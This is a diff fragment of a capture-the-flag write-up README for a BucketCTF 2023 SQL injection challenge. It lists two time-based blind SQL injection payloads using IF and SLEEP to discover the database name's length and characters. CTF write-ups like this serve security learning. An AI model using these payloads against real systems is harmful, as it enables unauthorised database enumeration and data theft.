christiancioffi/CTF_Write-ups/BucketCTF_2023/WEB/SQLi/SQLi-4/README.md

 ## Payloads

-These payloads should be used in loops with different values.
+These payloads should be used in loops with different values (as shown in the codes above).

 + <code>' OR 1=IF((SELECT LENGTH(database()))=numeric_value, SLEEP(5), 1)#</code> for the length of the database name<br>
 + <code>' OR 1=IF((SELECT database()) LIKE 'substring%', SLEEP(5), 1)#</code> for database name<br>